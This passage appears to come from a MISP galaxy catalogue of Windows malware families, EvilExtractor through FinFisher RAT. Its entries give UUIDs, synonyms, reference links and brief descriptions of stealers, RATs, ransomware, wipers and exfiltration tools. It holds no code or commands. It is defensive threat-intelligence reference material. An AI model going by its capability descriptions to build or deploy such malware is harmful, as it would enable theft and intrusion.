- https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/ - webarchive
- https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EvilExtractor
Internal MISP references
UUID e020212b-03ef-4168-97f5-bb72ff627d94
which can be used as unique global reference for EvilExtractor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EvilGrab
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EvilGrab.
Known Synonyms |
---|
Vidgrab |
Internal MISP references
UUID 438c6d0f-03f0-4b49-89d2-40bf5349c3fc
which can be used as unique global reference for EvilGrab
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf - webarchive
- https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EVILNUM (Windows)
Internal MISP references
UUID da922c36-ca13-4ea2-a22d-471e91ddac93
which can be used as unique global reference for EVILNUM (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum - webarchive
- https://docs.broadcom.com/doc/ransom-and-malware-attacks-on-financial-services-institutions - webarchive
- https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets - webarchive
- https://github.com/eset/malware-ioc/tree/master/evilnum - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/buy-sell-steal-evilnum-targets-cryptocurrency-forex-commodities - webarchive
- https://stairwell.com/resources/technical-analysis-the-silent-torrent-of-vilerat/ - webarchive
- https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ - webarchive
- https://mp.weixin.qq.com/s/lryl3a65uIz1AwZcfuzp1A - webarchive
- https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EvilPlayout
A wiper used in an attack against Iran's state broadcaster. The campaign name coined by Check Point is used here for lack of a better name for the wiper component.
Internal MISP references
UUID a90a1c08-00ea-49ad-8f79-9a4461fce48e
which can be used as unique global reference for EvilPlayout
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EvilPony
Privately modded version of the Pony stealer.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EvilPony.
Known Synonyms |
---|
CREstealer |
Internal MISP references
UUID e26579d9-1d93-4a3b-a41e-263254d85189
which can be used as unique global reference for EvilPony
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Evrial
Internal MISP references
UUID af3a3ece-e67f-457a-be72-7651bc720342
which can be used as unique global reference for Evrial
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Exaramel (Windows)
Internal MISP references
UUID dd68abd7-b20a-40a5-be53-ae8d45c1dd27
which can be used as unique global reference for Exaramel (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf - webarchive
- https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/ - webarchive
- https://www.wired.com/story/sandworm-centreon-russia-hack/ - webarchive
- https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf - webarchive
- https://attack.mitre.org/groups/G0034 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ExByte
ExByte is a custom data exfiltration tool and infostealer observed being used during BlackByte ransomware attacks.
Internal MISP references
UUID 42f4fee9-a5c2-4643-be56-fba8700f835d
which can be used as unique global reference for ExByte
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.exbyte - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Excalibur
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Excalibur.
Known Synonyms |
---|
Saber |
Sabresac |
Internal MISP references
UUID 3cec2c3c-1669-40cf-8612-eb826f7d2c98
which can be used as unique global reference for Excalibur
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MS Exchange Tool
Internal MISP references
UUID 74f8db32-799c-41e5-9815-6272908ede57
which can be used as unique global reference for MS Exchange Tool
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool - webarchive
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ - webarchive
- https://github.com/nccgroup/Royal_APT - webarchive
- https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Exile RAT
ExileRAT is a simple RAT platform capable of getting information on the system (computer name, username, listing drives, network adapter, process name), getting/pushing files and executing/terminating processes.
Internal MISP references
UUID c932a2f3-1470-4b0c-8412-2d081901277b
which can be used as unique global reference for Exile RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ExMatter
Exfiltration tool written in .NET, used by at least one BlackMatter ransomware operator.
Internal MISP references
UUID 615e22f7-1b0e-44a0-a666-b95cb6b5e279
which can be used as unique global reference for ExMatter
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.exmatter - webarchive
- https://www.accenture.com/us-en/blogs/security/stealbit-exmatter-exfiltration-tool-analysis - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration - webarchive
- https://twitter.com/knight0x07/status/1461787168037240834?s=20 - webarchive
- https://www.kroll.com/en/insights/publications/cyber/analyzing-exmatter-ransomware-data-exfiltration-tool - webarchive
- https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack - webarchive
- https://www.s-rminform.com/cyber-intelligence-briefing/exmatter-malware-levels-up - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Exorcist
According to PCrisk, Exorcist is a ransomware-type malicious program. Systems infected with this malware experience data encryption and users receive ransom demands for decryption. During the encryption process, all compromised files are appended with an extension consisting of a random string of characters.
For example, a file originally named "1.jpg" could appear as something similar to "1.jpg.rnyZoV" following encryption. After this process is complete, Exorcist ransomware changes the desktop wallpaper and drops HTML applications named "[random-string]-decrypt.hta" (e.g. "rnyZoV-decrypt.hta") into affected folders. These files contain identical ransom messages.
Internal MISP references
UUID d742986c-04f0-48ef-aaa3-10eeb0e95be4
which can be used as unique global reference for Exorcist
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Expiro
Expiro malware has been around for more than a decade, and the malware authors still continue their work and update it with more features. The infection routine was also changed in samples found in 2017 (described by McAfee). Expiro "infiltrates" executables on 32- and 64-bit Windows OS versions. It has capabilities to install browser extensions, change security behaviour/settings on the infected system, and steal information (e.g. account credentials). In 2022 a newly described EPO file infector source code called m0yv appeared, which is wrongly identified as Expiro by some AVs.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Expiro.
Known Synonyms |
---|
Xpiro |
Internal MISP references
UUID fd34b588-7b00-4924-827b-6118bece0af1
which can be used as unique global reference for Expiro
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.expiro - webarchive
- https://github.com/GiacomoFerro/malware-analysis/blob/master/report/report-malware.pdf - webarchive
- https://www.welivesecurity.com/2013/07/30/versatile-and-infectious-win64expiro-is-a-cross-platform-file-infector/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/expiro-infects-encrypts-files-to-complicate-repair/ - webarchive
- https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Expiro - webarchive
- https://youtu.be/3RYbkORtFnk - webarchive
- https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ExplosiveRAT
Internal MISP references
UUID d3600857-b941-4d47-81ef-02c168396518
which can be used as unique global reference for ExplosiveRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Xtreme RAT
According to Trend Micro, Extreme RAT (XTRAT, Xtreme Rat) is a Remote Access Trojan that can steal information. This RAT has been used in attacks targeting Israeli and Syrian governments in 2012.
This malware family of backdoors has the capability to receive commands such as File Management (Download, Upload, and Execute Files), Registry Management (Add, Delete, Query, and Modify Registry), Perform Shell Command, Computer Control (Shutdown, Log on/off), and Screen capture from a remote attacker. In addition, it can also log keystrokes of the infected systems.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Xtreme RAT.
Known Synonyms |
---|
ExtRat |
Internal MISP references
UUID 6ec2b6b1-c1a7-463a-b135-edb51764cf38
which can be used as unique global reference for Xtreme RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat - webarchive
- https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g - webarchive
- https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html - webarchive
- https://www.secureworks.com/research/threat-profiles/aluminum-saratoga - webarchive
- https://blogs.360.cn/post/APT-C-44.html - webarchive
- https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat - webarchive
- https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/ - webarchive
- https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017 - webarchive
- https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1 - webarchive
- https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html - webarchive
- https://embeeresearch.io/practical-queries-for-malware-infrastructure-part-3/ - webarchive
- https://citizenlab.ca/2015/12/packrat-report/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Eye Pyramid
Internal MISP references
UUID a7489029-21d4-44c9-850a-8f656a98cb22
which can be used as unique global reference for Eye Pyramid
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EYService
EYService is the main part of the backdoor used by Nazar APT. This is a passive backdoor that relies on the now-discontinued Packet Sniffer SDK (PSSDK) from Microolap.
Internal MISP references
UUID 9b287426-e82f-407e-8d12-42dac4241bf8
which can be used as unique global reference for EYService
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice - webarchive
- https://www.epicturla.com/blog/the-lost-nazar - webarchive
- https://blog.malwarelab.pl/posts/nazar_eyservice_comm/ - webarchive
- https://research.checkpoint.com/2020/nazar-spirits-of-the-past/ - webarchive
- https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf - webarchive
- https://blog.malwarelab.pl/posts/nazar_eyservice/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Fabookie
Fabookie is a Facebook account information stealer.
Internal MISP references
UUID 782aa125-42ff-4ca0-b9b1-362aac08566b
which can be used as unique global reference for Fabookie
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.fabookie - webarchive
- https://inside.harfanglab.io/blog/articles/cyber-threat-intelligence/loader-galore-taskloader-at-the-start-of-a-pay-per-install-infection-chain/ - webarchive
- https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1 - webarchive
- https://ics-cert.kaspersky.com/publications/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/ - webarchive
- https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FakeCry
Malware written in .NET that mimics WannaCry.
Internal MISP references
UUID c9ac3322-c176-444c-8d72-603430dca2d0
which can be used as unique global reference for FakeCry
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FakeRean
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FakeRean.
Known Synonyms |
---|
Braviax |
Internal MISP references
UUID 653df134-88c9-47e2-99a5-06e0406ab6d4
which can be used as unique global reference for FakeRean
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean - webarchive
- https://0x3asecurity.wordpress.com/2015/11/30/134260124544/ - webarchive
- https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf - webarchive
- https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FakeTC
Internal MISP references
UUID 6b0030bc-6e45-43b0-9175-15fe8fbd0942
which can be used as unique global reference for FakeTC
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FakeWord
Internal MISP references
UUID 6eb3546c-cb8b-447c-81d1-9c4c1166581d
which can be used as unique global reference for FakeWord
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
fancyfilter
FancyFilter is a piece of code that documents code overlap between frameworks used by Regin and Equation Group.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular fancyfilter.
Known Synonyms |
---|
0xFancyFilter |
Internal MISP references
UUID e7d06257-2bc6-45b6-8728-080df9932f90
which can be used as unique global reference for fancyfilter
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Fanny
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Fanny.
Known Synonyms |
---|
DEMENTIAWHEEL |
Internal MISP references
UUID 6d441619-c5f5-45ff-bc63-24cecd0b237e
which can be used as unique global reference for Fanny
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny - webarchive
- https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf - webarchive
- https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/ - webarchive
- https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/ - webarchive
- https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1 - webarchive
- https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/ - webarchive
- https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FantomCrypt
According to PCrisk, Fantom is a ransomware-type virus that imitates the Windows update procedure while encrypting files. This is unusual, since most ransomware encrypts files stealthily without showing any activity. During encryption, Fantom appends the names of encrypted files with the ".locked4", ".fantom" or ".locked" extension.
Internal MISP references
UUID 29f4ae5a-4ccd-451b-bd3e-d301865da034
which can be used as unique global reference for FantomCrypt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Farseer
Internal MISP references
UUID f197b0a8-6bea-42ea-b57f-8f6f202f7602
which can be used as unique global reference for Farseer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer - webarchive
- https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/ - webarchive
- https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FastLoader
FastLoader is a small .NET downloader whose name comes from PDB strings seen in samples. It typically downloads TrickBot. It may create a list of running processes and upload it together with one or more screenshots. More recent versions employ simple anti-analysis checks (VM detection) and come with string obfuscation.
Internal MISP references
UUID 21b86dbb-d000-449c-bfe4-41faede4bd89
which can be used as unique global reference for FastLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FastPOS
Internal MISP references
UUID 1bf03bbb-d3a2-4713-923b-218186c86914
which can be used as unique global reference for FastPOS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos - webarchive
- http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf - webarchive
- https://www.justice.gov/opa/pr/malware-author-pleads-guilty-role-transnational-cybercrime-organization-responsible-more-568 - webarchive
- http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-quick-and-easy-credit-card-theft/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FatalRat
According to PCrisk, FatalRAT is the name of a Remote Access Trojan (RAT). A RAT is a type of malware that allows the attacker to remotely control the infected computer and use it for various purposes.
Typically, RATs are used to access files and other data, watch computing activities on the screen and capture screenshots, steal sensitive information (e.g., login credentials, credit card details).
There are many legitimate remote administration/access tools on the Internet. It is common that cybercriminals use those tools with malicious intent too.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FatalRat.
Known Synonyms |
---|
Sainbox RAT |
Internal MISP references
UUID 28697d08-27c0-47a9-bfd6-654cac4d55cc
which can be used as unique global reference for FatalRat
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat - webarchive
- https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html - webarchive
- https://cybersecurity.att.com/blogs/labs-research/new-sophisticated-rat-in-town-fatalrat-analysis - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/chinese-malware-appears-earnest-across-cybercrime-threat-landscape - webarchive
- https://www.youtube.com/watch?v=gjvnVZc11Vg - webarchive
- https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FatDuke
According to ESET Research, FatDuke is the current flagship backdoor of APT29 and is only deployed on the most interesting machines. It is generally dropped by the MiniDuke backdoor, but ESET also have seen the operators dropping FatDuke using lateral movement tools such as PsExec. The operators regularly repack this malware in order to evade detections. The most recent sample of FatDuke that ESET have seen was compiled on May 24, 2019. They have seen them trying to regain control of a machine multiple times in a few days, each time with a different sample. Their packer, described in a later section, adds a lot of code, leading to large binaries. While the effective code should not be larger than 1MB, ESET have seen one sample weighing in at 13MB, hence our name for this backdoor component: FatDuke.
Internal MISP references
UUID 4325c84b-9a9b-4e7c-977f-20d7ae817b7e
which can be used as unique global reference for FatDuke
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Fauppod
Internal MISP references
UUID e363918a-92ec-49c0-b3b2-1d339200417b
which can be used as unique global reference for Fauppod
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.fauppod - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
- http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FCT
Ransomware.
Internal MISP references
UUID a4eb3f1f-2cc6-4a0f-9dd8-6ebc192ec0cd
which can be used as unique global reference for FCT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FDMTP
FDMTP is a newly discovered hacking tool written in .NET and used by Earth Preta. It functions as a simple malware downloader built on the TouchSocket framework and its Duplex Message Transport Protocol (DMTP). In one campaign, the threat actors embedded FDMTP in the data section of a DLL, allowing it to be launched through DLL side-loading. Its embedded network configuration is Base64-encoded and DES-encrypted to hinder analysis and evade detection. It has been observed serving as a secondary control tool, often deployed by the PUBLOAD backdoor.
Internal MISP references
UUID 61a023be-3f35-4340-8d4a-8ffd2a5e035e
which can be used as unique global reference for FDMTP
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FeedLoad
Internal MISP references
UUID a9cd466f-af46-48fa-906e-15cf27525c7f
which can be used as unique global reference for FeedLoad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Felismus
Internal MISP references
UUID 07a41ea7-17b2-4852-bfd7-54211c477dc0
which can be used as unique global reference for Felismus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Felixroot
Internal MISP references
UUID e58755ac-3d0c-4ed3-afeb-e929816c8018
which can be used as unique global reference for Felixroot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html - webarchive
- https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257 - webarchive
- https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
fengine
Internal MISP references
UUID 3087a4ed-1b6c-49f6-980f-59242825d2ee
which can be used as unique global reference for fengine
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Fenix
Internal MISP references
UUID e367f4e8-fcff-4a25-a7b9-095be2f797df
which can be used as unique global reference for Fenix
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Feodo
Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victim's computer, such as credit card details or credentials.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Feodo.
Known Synonyms |
---|
Bugat |
Cridex |
Internal MISP references
UUID 66781866-f064-467d-925d-5e5f290352f0
which can be used as unique global reference for Feodo
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo - webarchive
- http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html - webarchive
- https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/ - webarchive
- https://feodotracker.abuse.ch/ - webarchive
- https://en.wikipedia.org/wiki/Maksim_Yakubets - webarchive
- http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FFDroider
According to PCrisk, FFDroider is a malicious program classified as a stealer. It is designed to extract and exfiltrate sensitive data from infected devices. FFDroider targets popular social media and e-commerce platforms in particular.
Internal MISP references
UUID f557e98e-7e8c-450f-a2a2-abbe81a67a90
which can be used as unique global reference for FFDroider
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ficker Stealer
According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (we’ll cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.
Internal MISP references
UUID 6ad46852-24f3-4415-a4ab-57a52cd8a1cb
which can be used as unique global reference for Ficker Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer - webarchive
- https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus - webarchive
- https://blogs.blackberry.com/en/2021/08/threat-thursday-ficker-infostealer-malware - webarchive
- https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon - webarchive
- https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market - webarchive
- https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/fake-microsoft-store-spotify-sites-spread-info-stealing-malware/ - webarchive
- https://twitter.com/3xp0rtblog/status/1321209656774135810 - webarchive
- https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FileIce
Internal MISP references
UUID ed0b8ac9-973b-4aaa-9904-8c7ed2e73933
which can be used as unique global reference for FileIce
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Filerase
Filerase is a .NET API-based utility capable of propagating and recursively deleting files.
Internal MISP references
UUID e5fbb536-4994-4bd5-b151-6d5e41ed9f5b
which can be used as unique global reference for Filerase
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.filerase - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Final1stSpy
Internal MISP references
UUID 87467366-679d-425c-8bea-b9f77c543252
which can be used as unique global reference for Final1stSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FindPOS
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FindPOS.
Known Synonyms |
---|
Poseidon |
Internal MISP references
UUID ae914b9a-67a2-425d-bef0-3a9624a207ba
which can be used as unique global reference for FindPOS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos - webarchive
- https://blogs.cisco.com/security/talos/poseidon - webarchive
- https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FinFisher RAT
FinFisher is a commercial software used to steal information and spy on affected victims. It began with few functionalities which included password harvesting and information leakage, but now it is mostly known for its full Remote Access Trojan (RAT) capabilities. It is mostly known for being used in governmental targeted and lawful criminal investigations. It is well known for its anti-detection capabilities and use of VMProtect.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FinFisher RAT.
Known Synonyms |
---|
FinSpy |
Internal MISP references
UUID 541b64bc-87ec-4cc2-aaee-329355987853
which can be used as unique global reference for FinFisher RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher - webarchive
- https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html - webarchive
- https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-2-first-attempt-at-devirtualization - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/ - webarchive
- https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/ - webarchive
- https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/ - webarchive
- https://www.msreverseengineering.com/blog/2018/2/21/finspy-vm-unpacking-tutorial-part-3-devirtualization - webarchive
- https://www.msreverseengineering.com/blog/2018/2/21/wsbjxrs1jjw7qi4trk9t3qy6hr7dye - webarchive
- https://github.com/RolfRolles/FinSpyVM - webarchive
- https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/ - webarchive
